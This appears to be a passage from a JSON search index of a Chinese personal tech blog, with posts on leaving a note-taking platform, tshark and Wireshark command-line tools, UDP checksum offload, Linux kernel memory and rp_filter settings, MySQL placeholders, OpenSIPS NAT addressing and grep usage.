但是廉颇老矣,尚能饭否?\nmbp面无表情,胡子邋遢,朝我瞥了一眼,像是嘲讽,又像是不满,一口气吸掉还剩一点的香烟,有气无力的说:我已经工作五年了,按照国家的法律规定,已经到了退休的年龄,是该享受享受了。\n我","title":"关于我在闲鱼卖二手这件事"},{"content":"我最早用过有道,我觉得有道很烂。\n后来我开始用印象笔记,我发现印象笔记更烂。不仅界面做的让人觉得侮辱眼睛,即使你开了会员也要看广告。 印象笔记会员被割了韭菜,充到了2026年,但是我最近一两年我基本没有用过印象笔记。\n后来我遇到了文档blog界的new school, notion、语雀、飞书, 就完全抛弃了有道和印象笔记的old school。\n做任何事情,都需要动机。\n写公开博客也是如此。可能有以下原因\n提升个人影响力 提高自己的表达能力 知识积累和分享 公开博客需要三方角力,平台方、内容生产者、内容消费者(读者)。\n作为内容生产者,我们从选择一个平台是需要很多理由的。可能是UI界面的颜值,可能是一见钟情界面交互。\n就像男女的相亲,首先要被外貌吸引,才能有下文。\n然而除了那一见钟情的必然是短暂的,除此之外,我发现了另一个重要原因:迁移成本\n我以前决定不用印象的时候,印象笔记上还有我将近一千多篇的笔记。虽说印象笔记有导出工具,但是只有当你用的时候,你才能体会导出工具是多坑爹。\n假如你一天决定不用这个平台了,你想把所有你产出的内容都迁移出来,你要花费多少成本呢? 很多人都没有考虑过这件事情。\n就像温水煮青蛙,只有感觉到烫的时候,青蛙才会准备跳走,但是青蛙还能跳出去吗? 可能他的腿都已经煮熟了吧?\n从另外一个方面来说,作为内容生产者,我们要花时间,花精力来写文章,还要花金钱来买平台的会员,然而平台对内容生产者来说,有什么回报呢?\n我们只不过是为他人做嫁衣罢了。就像旧时代的长工,只不过在一个大一点的地主家干活了吧。\n再见了,语雀。\n新的bolg地址: wdd.js.org\n我以前没得选,我现在想选择做个自由人\n","permalink":"https://wdd.js.org/posts/2022/06/fk9rgk/","summary":"我最早用过有道,我觉得有道很烂。\n后来我开始用印象笔记,我发现印象笔记更烂。不仅界面做的让人觉得侮辱眼睛,即使你开了会员也要看广告。 印象笔记会员被割了韭菜,充到了2026年,但是我最近一两年我基本没有用过印象笔记。\n后来我遇到了文档blog界的new school, notion、语雀、飞书, 就完全抛弃了有道和印象笔记的old school。\n做任何事情,都需要动机。\n写公开博客也是如此。可能有以下原因\n提升个人影响力 提高自己的表达能力 知识积累和分享 公开博客需要三方角力,平台方、内容生产者、内容消费者(读者)。\n作为内容生产者,我们从选择一个平台是需要很多理由的。可能是UI界面的颜值,可能是一见钟情界面交互。\n就像男女的相亲,首先要被外貌吸引,才能有下文。\n然而除了那一见钟情的必然是短暂的,除此之外,我发现了另一个重要原因:迁移成本\n我以前决定不用印象的时候,印象笔记上还有我将近一千多篇的笔记。虽说印象笔记有导出工具,但是只有当你用的时候,你才能体会导出工具是多坑爹。\n假如你一天决定不用这个平台了,你想把所有你产出的内容都迁移出来,你要花费多少成本呢? 很多人都没有考虑过这件事情。\n就像温水煮青蛙,只有感觉到烫的时候,青蛙才会准备跳走,但是青蛙还能跳出去吗? 可能他的腿都已经煮熟了吧?\n从另外一个方面来说,作为内容生产者,我们要花时间,花精力来写文章,还要花金钱来买平台的会员,然而平台对内容生产者来说,有什么回报呢?\n我们只不过是为他人做嫁衣罢了。就像旧时代的长工,只不过在一个大一点的地主家干活了吧。\n再见了,语雀。\n新的bolg地址: wdd.js.org\n我以前没得选,我现在想选择做个自由人","title":"最后一篇blog, 是时候说再见了"},{"content":"1. 使用摘要 一个命令的使用摘要非常重要,摘要里包含了这个工具最常用的用法。\n要注意的是,如果要用过滤器,一定要放到最后。\ntshark [ -i \u0026lt;capture interface\u0026gt;|- ] [ -f \u0026lt;capture filter\u0026gt; ] [ -2 ] [ -r \u0026lt;infile\u0026gt; ] [ -w \u0026lt;outfile\u0026gt;|- ] [ options ] [ \u0026lt;filter\u0026gt; ] tshark -G [ \u0026lt;report type\u0026gt; ] [ --elastic-mapping-filter \u0026lt;protocols\u0026gt; ] 2. 为什么要学习tshark? 一般情况下,我们可能会在服务端用tcpdump抓包,然后把包拿下来,用wireshark分析。那么我们为什么要学习tshark呢?\n相比于wireshark, tshark有以下的优点\n速度飞快:wireshark在加载包的时候,tshark可能已经给出了结果。 更稳定:wireshark在处理包的时候,常常容易崩溃 更适合做文本处理:tshark的输出是文本,这个文本很容易被awk, sort, uniq等等命令处理 但是我不建议上来就学习,更建议在熟悉wireshark之后,再去进一步学习tshark\n3. 使用场景 3.1 基本场景 用wireshark最基本的场景的把pcap文件拖动到wireshark中,然后可能加入一些过滤条件。\ntshark -r demo.pcap tshark -r demo.pcap -c 1 # 只读一个包就停止 输出的列分别为:序号,相对时间,绝对时间,源ip, 源端口,目标ip, 目标端口\n3.2 按照表格输出 tshark -r demo.pcap -T tabs 3.3 按照指定的列输出 例如,抓的的sip的包,我们只想输出sip的user-agent字段。\ntshark -r demo.pcap -Tfields -e sip.User-Agent sip and sip.Method==REGISTER 按照上面的输出,我们可以用简单的sort和seq就可以把所有的设备类型打印出来。\n3.4 过滤之后写入文件 比如一个很大的pcap文件,我们可以用tshark过滤之后,写入一个新的文件。\n例如下面的,我们使用过滤器sip and sip.Method==REGISTER, 然后把过滤后的包写入到register.pcap\n● -Y \u0026ldquo;sip and frame.cap_len \u0026gt; 1300\u0026rdquo; 查看比较大的SIP包 tshark -r demo.pcap -w register.pcap sip and sip.Method==REGISTER\n3.4 统计分析 tshark支持统计分析,例如统计rtp 丢包率。\ntshark -r demo.pcap -qn -z rtp,streams -z参数是用来各种统计分析的,具体支持的统计类型,可以用\ntshark -z help ➜ Desktop tshark -z help afp,srt ancp,tree ansi_a,bsmap ansi_a,dtap ansi_map asap,stat bacapp_instanceid,tree bacapp_ip,tree bacapp_objectid,tree bacapp_service,tree calcappprotocol,stat camel,counter camel,srt collectd,tree componentstatusprotocol,stat conv,bluetooth conv,dccp conv,eth conv,fc 参考 https://www.wireshark.org/docs/man-pages/tshark.html ","permalink":"https://wdd.js.org/network/tshark/","summary":"1. 使用摘要 一个命令的使用摘要非常重要,摘要里包含了这个工具最常用的用法。\n要注意的是,如果要用过滤器,一定要放到最后。\ntshark [ -i \u0026lt;capture interface\u0026gt;|- ] [ -f \u0026lt;capture filter\u0026gt; ] [ -2 ] [ -r \u0026lt;infile\u0026gt; ] [ -w \u0026lt;outfile\u0026gt;|- ] [ options ] [ \u0026lt;filter\u0026gt; ] tshark -G [ \u0026lt;report type\u0026gt; ] [ --elastic-mapping-filter \u0026lt;protocols\u0026gt; ] 2. 为什么要学习tshark? 一般情况下,我们可能会在服务端用tcpdump抓包,然后把包拿下来,用wireshark分析。那么我们为什么要学习tshark呢?\n相比于wireshark, tshark有以下的优点\n速度飞快:wireshark在加载包的时候,tshark可能已经给出了结果。 更稳定:wireshark在处理包的时候,常常容易崩溃 更适合做文本处理:tshark的输出是文本,这个文本很容易被awk, sort, uniq等等命令处理 但是我不建议上来就学习,更建议在熟悉wireshark之后,再去进一步学习tshark\n3. 使用场景 3.1 基本场景 用wireshark最基本的场景的把pcap文件拖动到wireshark中,然后可能加入一些过滤条件。\ntshark -r demo.pcap tshark -r demo.pcap -c 1 # 只读一个包就停止 输出的列分别为:序号,相对时间,绝对时间,源ip, 源端口,目标ip, 目标端口","title":"Tshark入门到精通"},{"content":"在服务端抓包,然后在wireshark上分析,发现wireshark提示:udp checksum字段有问题\nchecksum 0x\u0026hellip; incrorect should be 0x.. (maybe caused by udp checksum offload)\n以前我从未遇到过udp checksum的问题。所以这次是第一次遇到,所以需要学习一下。 首先udp checksum是什么?\n我们看下udp的协议组成的字段,其中就有16位的校验和\n校验和一般都是为了检验数据包在传输过程中是否出现变动的。\n如果接受端收到的udp消息校验和错误,将会被悄悄的丢弃 udp校验和是一个端到端的校验和。端到端意味它不会在中间网络设备上校验。 校验和由发送方负责计算,接收端负责验证。目的是为了发现udp首部和和数据在发送端和接受端之间是否发生了变动 udp校验和是可选的功能,但是总是应该被默认启用。 如果发送方设置了udp校验和,则接受方必须验证 发送方负责计算?具体是谁负责计算\n计算一般都是CPU的工作,但是有些网卡也是支持checksum offload的。\n所谓offload, 是指本来可以由cpu计算的,改变由网卡硬件负责计算。 这样做有很多好处,\n可以降低cpu的负载,提高系统的性能 网卡的硬件checksum, 效率更高 为什么只有发送方出现udp checksum 错误? 我在接受方和放松方都进行了抓包,一个比较特殊的特征是,只有发送方发现了udp checksum的错误,在接受方,同样的包,udp checksum的值却是正确的。\n一句话的解释:tcpdump在接收方抓到的包,本身checksum字段还没有被计算,在后续的步骤,这个包才会被交给NIC, NIC来负责计算。\n结论 maybe caused by udp checksum offload 这个报错并没有什么问题。\n参考 ● 《tcp/ip 详解》 ● https://www.kernel.org/doc/html/latest/networking/checksum-offloads.html ● https://dominikrys.com/posts/disable-udp-checksum-validation/ ● https://sokratisg.net/2012/04/01/udp-tcp-checksum-errors-from-tcpdump-nic-hardware-offloading/\n","permalink":"https://wdd.js.org/network/udp-checksum-offload/","summary":"在服务端抓包,然后在wireshark上分析,发现wireshark提示:udp checksum字段有问题\nchecksum 0x\u0026hellip; incrorect should be 0x.. (maybe caused by udp checksum offload)\n以前我从未遇到过udp checksum的问题。所以这次是第一次遇到,所以需要学习一下。 首先udp checksum是什么?\n我们看下udp的协议组成的字段,其中就有16位的校验和\n校验和一般都是为了检验数据包在传输过程中是否出现变动的。\n如果接受端收到的udp消息校验和错误,将会被悄悄的丢弃 udp校验和是一个端到端的校验和。端到端意味它不会在中间网络设备上校验。 校验和由发送方负责计算,接收端负责验证。目的是为了发现udp首部和和数据在发送端和接受端之间是否发生了变动 udp校验和是可选的功能,但是总是应该被默认启用。 如果发送方设置了udp校验和,则接受方必须验证 发送方负责计算?具体是谁负责计算\n计算一般都是CPU的工作,但是有些网卡也是支持checksum offload的。\n所谓offload, 是指本来可以由cpu计算的,改变由网卡硬件负责计算。 这样做有很多好处,\n可以降低cpu的负载,提高系统的性能 网卡的硬件checksum, 效率更高 为什么只有发送方出现udp checksum 错误? 我在接受方和放松方都进行了抓包,一个比较特殊的特征是,只有发送方发现了udp checksum的错误,在接受方,同样的包,udp checksum的值却是正确的。\n一句话的解释:tcpdump在接收方抓到的包,本身checksum字段还没有被计算,在后续的步骤,这个包才会被交给NIC, NIC来负责计算。\n结论 maybe caused by udp checksum offload 这个报错并没有什么问题。\n参考 ● 《tcp/ip 详解》 ● https://www.kernel.org/doc/html/latest/networking/checksum-offloads.html ● https://dominikrys.com/posts/disable-udp-checksum-validation/ ● https://sokratisg.net/2012/04/01/udp-tcp-checksum-errors-from-tcpdump-nic-hardware-offloading/","title":"Udp Checksum Offload"},{"content":"大多数时候我们都是图形界面的方式使用wireshak, 其实一般只要你安装了wireshark,同时也附带安装了一些命令行工具。 这些工具也可以极大的提高生产效率。 本文只是对工具的功能简介,可以使用命令 -h, 查看命令的具体使用文档。\n1. editcap 编辑抓包文件 Editcap (Wireshark) 3.6.1 (v3.6.1-0-ga0a473c7c1ba) Edit and/or translate the format of capture files. 举例: 按照时间范围从input.pcap文件中拿出指定时间范围的包\neditcap -A \u0026#39;2014-12-10 10:11:01\u0026#39; -B \u0026#39;2014-12-10 10:21:01\u0026#39; input.pcap output.pcap 2. androiddump 这个命令似乎可以用来对安卓系统进行抓包,没玩过安卓,不再多说。\nWireshark - androiddump v1.1.0 Usage: androiddump --extcap-interfaces [--adb-server-ip=\u0026lt;arg\u0026gt;] [--adb-server-tcp-port=\u0026lt;arg\u0026gt;] androiddump --extcap-interface=INTERFACE --extcap-dlts androiddump --extcap-interface=INTERFACE --extcap-config androiddump --extcap-interface=INTERFACE --fifo=PATH_FILENAME --capture 3. ciscodump 似乎是对思科的网络进行抓包的,没用过 Wireshark - ciscodump v1.0.0 Usage: ciscodump \u0026ndash;extcap-interfaces ciscodump \u0026ndash;extcap-interface=ciscodump \u0026ndash;extcap-dlts ciscodump \u0026ndash;extcap-interface=ciscodump \u0026ndash;extcap-config ciscodump \u0026ndash;extcap-interface=ciscodump \u0026ndash;remote-host myhost \u0026ndash;remote-port 22222 \u0026ndash;remote-username myuser \u0026ndash;remote-interface gigabit0/0 \u0026ndash;fifo=FILENAME \u0026ndash;capture\n4. randpktdump 这个似乎也是一个网络抓包的 Wireshark - randpktdump v0.1.0 Usage: randpktdump \u0026ndash;extcap-interfaces randpktdump \u0026ndash;extcap-interface=randpkt \u0026ndash;extcap-dlts randpktdump \u0026ndash;extcap-interface=randpkt \u0026ndash;extcap-config randpktdump \u0026ndash;extcap-interface=randpkt \u0026ndash;type dns \u0026ndash;count 10 \u0026ndash;fifo=FILENAME \u0026ndash;capture\n5. sshdump 这个应该是对ssh进行抓包的 Wireshark - sshdump v1.0.0 Usage: sshdump \u0026ndash;extcap-interfaces sshdump \u0026ndash;extcap-interface=sshdump \u0026ndash;extcap-dlts sshdump \u0026ndash;extcap-interface=sshdump \u0026ndash;extcap-config sshdump \u0026ndash;extcap-interface=sshdump \u0026ndash;remote-host myhost \u0026ndash;remote-port 22222 \u0026ndash;remote-username myuser \u0026ndash;remote-interface eth2 \u0026ndash;remote-capture-command \u0026rsquo;tcpdump -U -i eth0 -w -\u0026rsquo; \u0026ndash;fifo=FILENAME \u0026ndash;capture\n6. idl2wrs 7. mergecap 合并多个抓包文件 mergecap -w output.pcap input1.pcap input2.pcap input3.pcap\n8. mmdbresolve 9. randpkt 10. rawshark 11. reordercap Reordercap (Wireshark) 3.6.1 (v3.6.1-0-ga0a473c7c1ba) Reorder timestamps of input file frames into output file. See https://www.wireshark.org for more information. Usage: reordercap [options] Options: -n don\u0026rsquo;t write to output file if the input file is ordered. -h display this help and exit. -v print version information and exit.\n12. sharkd Usage: sharkd [\u0026lt;classic_options\u0026gt;|\u0026lt;gold_options\u0026gt;] Classic (classic_options): [-|] examples:\nunix:/tmp/sharkd.sock - listen on unix file /tmp/sharkd.sock Gold (gold_options): -a , \u0026ndash;api listen on this socket -h, \u0026ndash;help show this help information -v, \u0026ndash;version show version information -C , \u0026ndash;config-profile start with specified configuration profile Examples: sharkd -C myprofile sharkd -a tcp:127.0.0.1:4446 -C myprofile See the sharkd page of the Wireshark wiki for full details. 13. text2pcap Text2pcap (Wireshark) 3.6.1 (v3.6.1-0-ga0a473c7c1ba) Generate a capture file from an ASCII hexdump of packets. See https://www.wireshark.org for more information. Usage: text2pcap [options] where specifies input filename (use - for standard input) specifies output filename (use - for standard output)\n14. tshark 命令行版本的wireshark, 用的最多的 TShark (Wireshark) 3.6.1 (v3.6.1-0-ga0a473c7c1ba) Dump and analyze network traffic. See https://www.wireshark.org for more information.\n15. udpdump Wireshark - udpdump v0.1.0 Usage: udpdump \u0026ndash;extcap-interfaces udpdump \u0026ndash;extcap-interface=udpdump \u0026ndash;extcap-dlts udpdump \u0026ndash;extcap-interface=udpdump \u0026ndash;extcap-config udpdump \u0026ndash;extcap-interface=udpdump \u0026ndash;port 5555 \u0026ndash;fifo myfifo \u0026ndash;capture Options: \u0026ndash;extcap-interfaces: list the extcap Interfaces \u0026ndash;extcap-dlts: list the DLTs \u0026ndash;extcap-interface : specify the extcap interface \u0026ndash;extcap-config: list the additional configuration for an interface \u0026ndash;capture: run the capture \u0026ndash;extcap-capture-filter : the capture filter \u0026ndash;fifo : dump data to file or fifo \u0026ndash;extcap-version: print tool version \u0026ndash;debug: print additional messages \u0026ndash;debug-file: print debug messages to file \u0026ndash;help: print this help \u0026ndash;version: print the version \u0026ndash;port : the port to listens on. Default: 5555\n16. capinfos 打印出包的各种信息 Capinfos (Wireshark) 3.6.1 (v3.6.1-0-ga0a473c7c1ba) Print various information (infos) about capture files. See https://www.wireshark.org for more information. Usage: capinfos [options] \u0026hellip; General infos: -t display the capture file type -E display the capture file encapsulation -I display the capture file interface information -F display additional capture file information -H display the SHA256, RIPEMD160, and SHA1 hashes of the file -k display the capture comment\n17. captype Captype (Wireshark) 3.6.1 (v3.6.1-0-ga0a473c7c1ba) Print the file types of capture files.\n18. dftest ➜ ~ dftest \u0026ndash;help\nFilter: \u0026ndash;help\n19. dumpcap See https://www.wireshark.org for more information.\n","permalink":"https://wdd.js.org/network/wireshark-extra-cli/","summary":"大多数时候我们都是图形界面的方式使用wireshak, 其实一般只要你安装了wireshark,同时也附带安装了一些命令行工具。 这些工具也可以极大的提高生产效率。 本文只是对工具的功能简介,可以使用命令 -h, 查看命令的具体使用文档。\n1. editcap 编辑抓包文件 Editcap (Wireshark) 3.6.1 (v3.6.1-0-ga0a473c7c1ba) Edit and/or translate the format of capture files. 举例: 按照时间范围从input.pcap文件中拿出指定时间范围的包\neditcap -A \u0026#39;2014-12-10 10:11:01\u0026#39; -B \u0026#39;2014-12-10 10:21:01\u0026#39; input.pcap output.pcap 2. androiddump 这个命令似乎可以用来对安卓系统进行抓包,没玩过安卓,不再多说。\nWireshark - androiddump v1.1.0 Usage: androiddump --extcap-interfaces [--adb-server-ip=\u0026lt;arg\u0026gt;] [--adb-server-tcp-port=\u0026lt;arg\u0026gt;] androiddump --extcap-interface=INTERFACE --extcap-dlts androiddump --extcap-interface=INTERFACE --extcap-config androiddump --extcap-interface=INTERFACE --fifo=PATH_FILENAME --capture 3. ciscodump 似乎是对思科的网络进行抓包的,没用过 Wireshark - ciscodump v1.0.0 Usage: ciscodump \u0026ndash;extcap-interfaces ciscodump \u0026ndash;extcap-interface=ciscodump \u0026ndash;extcap-dlts ciscodump \u0026ndash;extcap-interface=ciscodump \u0026ndash;extcap-config ciscodump \u0026ndash;extcap-interface=ciscodump \u0026ndash;remote-host myhost \u0026ndash;remote-port 22222 \u0026ndash;remote-username myuser \u0026ndash;remote-interface gigabit0/0 \u0026ndash;fifo=FILENAME \u0026ndash;capture","title":"Wireshark 附带的19命令行程序"},{"content":"环境 kernal Linux 5.15.48-1-MANJARO #1 SMP PREEMPT Thu Jun 16 12:33:56 UTC 2022 x86_64 GNU/Linux docker 20.10.16 初始内存 total used free shared buff/cache available 内存: 30Gi 1.9Gi 19Gi 2.0Mi 9.6Gi 28Gi 交换: 0B 0B 0B 初始配置 sysctl -n vm.min_free_kbytes 67584 sysctl -n vm.vfs_cache_pressure 200 vfs_cache_pressure的对内存的影响 vfs_cache_pressure设置为200, 理论系统倾向于回收内存\n","permalink":"https://wdd.js.org/posts/2022/06/eafeid/","summary":"环境 kernal Linux 5.15.48-1-MANJARO #1 SMP PREEMPT Thu Jun 16 12:33:56 UTC 2022 x86_64 GNU/Linux docker 20.10.16 初始内存 total used free shared buff/cache available 内存: 30Gi 1.9Gi 19Gi 2.0Mi 9.6Gi 28Gi 交换: 0B 0B 0B 初始配置 sysctl -n vm.min_free_kbytes 67584 sysctl -n vm.vfs_cache_pressure 200 vfs_cache_pressure的对内存的影响 vfs_cache_pressure设置为200, 理论系统倾向于回收内存","title":"vfs_cache_pressure和min_free_kbytes对cache的影响"},{"content":"# 将会下载packettracer到当前目录下 yay -G packettracer cd packettracer # Download PacketTracer_731_amd64.deb to this folder makepkg sudo pacman -U packettracer-7.3.1-2-x86_64.pkg.tar.xz 注意,如果下载的packetraacer包不是PacketTracer_731_amd64.deb, 则需要修改PKGBUILD文件中的, souce对应的文件名。 例如我下载的packettracer是Cisco_Packet_Tracer_811_Ubuntu_64bit_cf200f5851.deb\nsource=(\u0026#39;local://Cisco_Packet_Tracer_811_Ubuntu_64bit_cf200f5851.deb\u0026#39; \u0026#39;packettracer.sh\u0026#39;) 注意:最新版的packertracer打开后,必须登陆账号才能使用,有点坑。 花费点时间注册了账号后,才能用。\n参考 https://forum.manjaro.org/t/how-to-get-cisco-packet-tracer-on-manjaro/25506/5 ","permalink":"https://wdd.js.org/posts/2022/06/manjaro-packettracer/","summary":"# 将会下载packettracer到当前目录下 yay -G packettracer cd packettracer # Download PacketTracer_731_amd64.deb to this folder makepkg sudo pacman -U packettracer-7.3.1-2-x86_64.pkg.tar.xz 注意,如果下载的packetraacer包不是PacketTracer_731_amd64.deb, 则需要修改PKGBUILD文件中的, souce对应的文件名。 例如我下载的packettracer是Cisco_Packet_Tracer_811_Ubuntu_64bit_cf200f5851.deb\nsource=(\u0026#39;local://Cisco_Packet_Tracer_811_Ubuntu_64bit_cf200f5851.deb\u0026#39; \u0026#39;packettracer.sh\u0026#39;) 注意:最新版的packertracer打开后,必须登陆账号才能使用,有点坑。 花费点时间注册了账号后,才能用。\n参考 https://forum.manjaro.org/t/how-to-get-cisco-packet-tracer-on-manjaro/25506/5 ","title":"manjaro 安装 packettracer"},{"content":"问题现象 主机上有两个网卡ens192和ens224。ens129网卡是对内网络的网卡,ens224是对网网络的网卡。\nSIP信令阶段都是正常的,但是发现,对于来自node3的RTP流, 并没有从ens192网卡转发给node1上。\nsequenceDiagram title network autonumber node1-\u003e\u003eens192: INVITE ens224-\u003e\u003enode2: INVITE node2-\u003e\u003eens224: 200 ok ens192-\u003e\u003enode1: 200 ok node1-\u003e\u003eens192: ACK ens224-\u003e\u003enode2: ACK node1--\u003e\u003eens192: RTP out ens224--\u003e\u003enode3: RTP out node3--\u003e\u003eens224: RTP in 抓包程序抓到了node3发送到ens224上的包,但是排查应用服务器的日志发现,似乎应用服务器根本没有收到node3上过来的包, 所以也就无法转发。\n因而怀疑是不是在内核上被拦截了。 后来通过将rp_filter设置为0, 然后语音流的转发就正常了。\n事后复盘 node3的这个IP直接往应用服务器上发包,可能会被拦截。因为在信令建立的阶段,应用服务器并没有主动发\n在kernel文档上 rp_filter - INTEGER 0 - No source validation. 1 - Strict mode as defined in RFC3704 Strict Reverse Path Each incoming packet is tested against the FIB and if the interface is not the best reverse path the packet check will fail. By default failed packets are discarded. 2 - Loose mode as defined in RFC3704 Loose Reverse Path Each incoming packet\u0026#39;s source address is also tested against the FIB and if the source address is not reachable via any interface the packet check will fail. Current recommended practice in RFC3704 is to enable strict mode to prevent IP spoofing from DDos attacks. If using asymmetric routing or other complicated routing, then loose mode is recommended. The max value from conf/{all,interface}/rp_filter is used when doing source validation on the {interface}. Default value is 0. Note that some distributions enable it in startup scripts. 参考 https://www.jianshu.com/p/717e6cd9d2bb https://www.jianshu.com/p/16d5c130670b https://www.kernel.org/doc/Documentation/networking/ip-sysctl.txt ","permalink":"https://wdd.js.org/network/rp_filter/","summary":"问题现象 主机上有两个网卡ens192和ens224。ens129网卡是对内网络的网卡,ens224是对网网络的网卡。\nSIP信令阶段都是正常的,但是发现,对于来自node3的RTP流, 并没有从ens192网卡转发给node1上。\nsequenceDiagram title network autonumber node1-\u003e\u003eens192: INVITE ens224-\u003e\u003enode2: INVITE node2-\u003e\u003eens224: 200 ok ens192-\u003e\u003enode1: 200 ok node1-\u003e\u003eens192: ACK ens224-\u003e\u003enode2: ACK node1--\u003e\u003eens192: RTP out ens224--\u003e\u003enode3: RTP out node3--\u003e\u003eens224: RTP in 抓包程序抓到了node3发送到ens224上的包,但是排查应用服务器的日志发现,似乎应用服务器根本没有收到node3上过来的包, 所以也就无法转发。\n因而怀疑是不是在内核上被拦截了。 后来通过将rp_filter设置为0, 然后语音流的转发就正常了。\n事后复盘 node3的这个IP直接往应用服务器上发包,可能会被拦截。因为在信令建立的阶段,应用服务器并没有主动发\n在kernel文档上 rp_filter - INTEGER 0 - No source validation. 1 - Strict mode as defined in RFC3704 Strict Reverse Path Each incoming packet is tested against the FIB and if the interface is not the best reverse path the packet check will fail.","title":"Linux内核参数rp_filter"},{"content":" Error EXTRA *mysql.MySQLError=Error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \u0026lsquo;? ( 然而我仔细看了看sql语句,没有看出来究竟哪里有sql报错。\n然而当我把作为placeholder的问号去掉,直接用表的名字,sql是可以直接执行的。我意识到这个可能是和placeholder有关。\n搜索了一下,看到一个链接 https://github.com/go-sql-driver/mysql/issues/848\nPlaceholder can\u0026rsquo;t be used for table name or column name. It\u0026rsquo;s MySQL spec. Not bug of this project.\n大意是说,placeholder是不能作为表名或者列名的。\n在mysql关于prepared文档介绍中,在允许使用prepared的语句里,没有看到create table可以用placeholderhttps://dev.mysql.com/doc/refman/8.0/en/sql-prepared-statements.html\nprepared语句的优点有以下几个\n优化查询速度 防止sql注入 但是也有一些限制\n不是所有语句都能用prepared语句。常见的用法应该是作为select where之后的条件,或者INSERT语句之后的值 不支持一个sql中多条查询语句的形式 ","permalink":"https://wdd.js.org/posts/2022/06/vvdqw6/","summary":" Error EXTRA *mysql.MySQLError=Error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \u0026lsquo;? ( 然而我仔细看了看sql语句,没有看出来究竟哪里有sql报错。\n然而当我把作为placeholder的问号去掉,直接用表的名字,sql是可以直接执行的。我意识到这个可能是和placeholder有关。\n搜索了一下,看到一个链接 https://github.com/go-sql-driver/mysql/issues/848\nPlaceholder can\u0026rsquo;t be used for table name or column name. It\u0026rsquo;s MySQL spec. Not bug of this project.\n大意是说,placeholder是不能作为表名或者列名的。\n在mysql关于prepared文档介绍中,在允许使用prepared的语句里,没有看到create table可以用placeholderhttps://dev.mysql.com/doc/refman/8.0/en/sql-prepared-statements.html\nprepared语句的优点有以下几个\n优化查询速度 防止sql注入 但是也有一些限制\n不是所有语句都能用prepared语句。常见的用法应该是作为select where之后的条件,或者INSERT语句之后的值 不支持一个sql中多条查询语句的形式 ","title":"mysql placeholder的错误使用方式"},{"content":" OPS \u0026lt;\u0026lt;\u0026lt;----------------------------- ingress 内网 | 公网 | | 192.168.2.11 | 1.2.3.4 INNER_IP | OUTER_IP | | ------------------------------\u0026gt;\u0026gt;\u0026gt; egress 常见共有云的提供的云服务器,一般都有一个内网地址如192.16.2.11和一个公网地址如1.2.3.4。 内网地址是配置在网卡上的;公网地址则只是一个映射,并未在网卡上配置。\n我们称从公网到内网的方向为ingress,从内网到公网的方向为egress。\n对于内网来说OpenSIPS的广播地址应该是INNER_IP, 所以对ingress方向的SIP请求,Via应该是INNER_IP。对于公网来说OpenSIPS的广播地址应该是OUT_IP, 随意对于egress方向的SIP请求,Via应该是OUTER_IP。\n我们模拟一下,假如设置了错误的Via的地址会怎样呢?\n例如从公网到内网的一个INVITE, 如果Via头加上的是OUTER_IP, 那么这个请求的响应也会被送到OPS的公网地址。但是由于网络策略和防火墙等原因,这个来自内网的响应很可能无法被送到OPS的公网地址。\n一般情况下,我们可以使用listen的as参数来设置对外的广告地址。\nlisten = udp:192.168.2.11:5060 as 1.2.3.4:5060 这样的情况下,从内网发送到公网请求,携带的Via就被被设置成1.2.3.4。\n但是也不是as设置的广告地址一定正确。这时候我们就可以用OpenSIPS提供的核心函数set_advertised_address或者set_advertised_port()来在脚本里自定义对外地址。\n例如:\nif (请求来自外网) { set_advertised_address(\u0026#34;192.168.2.11\u0026#34;); } else { set_advertised_address(\u0026#34;1.2.3.4\u0026#34;); } ","permalink":"https://wdd.js.org/opensips/ch9/nat-single-interface/","summary":" OPS \u0026lt;\u0026lt;\u0026lt;----------------------------- ingress 内网 | 公网 | | 192.168.2.11 | 1.2.3.4 INNER_IP | OUTER_IP | | ------------------------------\u0026gt;\u0026gt;\u0026gt; egress 常见共有云的提供的云服务器,一般都有一个内网地址如192.16.2.11和一个公网地址如1.2.3.4。 内网地址是配置在网卡上的;公网地址则只是一个映射,并未在网卡上配置。\n我们称从公网到内网的方向为ingress,从内网到公网的方向为egress。\n对于内网来说OpenSIPS的广播地址应该是INNER_IP, 所以对ingress方向的SIP请求,Via应该是INNER_IP。对于公网来说OpenSIPS的广播地址应该是OUT_IP, 随意对于egress方向的SIP请求,Via应该是OUTER_IP。\n我们模拟一下,假如设置了错误的Via的地址会怎样呢?\n例如从公网到内网的一个INVITE, 如果Via头加上的是OUTER_IP, 那么这个请求的响应也会被送到OPS的公网地址。但是由于网络策略和防火墙等原因,这个来自内网的响应很可能无法被送到OPS的公网地址。\n一般情况下,我们可以使用listen的as参数来设置对外的广告地址。\nlisten = udp:192.168.2.11:5060 as 1.2.3.4:5060 这样的情况下,从内网发送到公网请求,携带的Via就被被设置成1.2.3.4。\n但是也不是as设置的广告地址一定正确。这时候我们就可以用OpenSIPS提供的核心函数set_advertised_address或者set_advertised_port()来在脚本里自定义对外地址。\n例如:\nif (请求来自外网) { set_advertised_address(\u0026#34;192.168.2.11\u0026#34;); } else { set_advertised_address(\u0026#34;1.2.3.4\u0026#34;); } ","title":"NAT场景下的信令处理 - 单网卡"},{"content":"1. grep 常用参数 参考: GNU Grep 3.0\n--color:高亮显示匹配到的字符串 -v:显示不能被pattern匹配到的 -i:忽略字符大小写 -o:仅显示匹配到的字符串 -q:静默模式,不输出任何信息 -A#:after,匹配到的后#行 -B#:before,匹配到的前#行 -C#:context,匹配到的前后各#行 -E:使用ERE,支持使用扩展的正则表达式 -c:只输出匹配行的计数。 -I:不区分大 小写(只适用于单字符)。 -h:查询多文件时不显示文件名。 -l:查询多文件时只输出包含匹配字符的文件名。 -n:显示匹配行及 行号。 - m: 匹配多少个关键词之后就停止搜索 -s:不显示不存在或无匹配文本的错误信息。 -v:显示不包含匹配文本的所有行。 2. 普通:搜索trace.log 中含有ERROR字段的日志 grep ERROR trace.log 3. 输出文件:可以将日志输出文件中 grep ERROR trace.log \u0026gt; error.log 4. 反向:搜索不包含ERROR字段的日志 grep -v ERROR trace.log 5. 向前:搜索包含ERROR,并且显示ERROR前10行的日志 grep -B 10 ERROR trace.log 6. 向后:搜索包含ERROR字段,并且显示ERROR后10行的日志 grep -A 10 ERROR trace.log 7. 上下文:搜索包含ERROR字段,并且显示ERROR字段前后10行的日志 grep -C 10 ERROR trace.log 8. 多字段:搜索包含ERROR和DEBUG字段的日志 gerp -E \u0026#39;ERROR|DEBUG\u0026#39; trace.log 9. 多文件:从多个.log文件中搜索含有ERROR的日志 grep ERROR *.log 10. 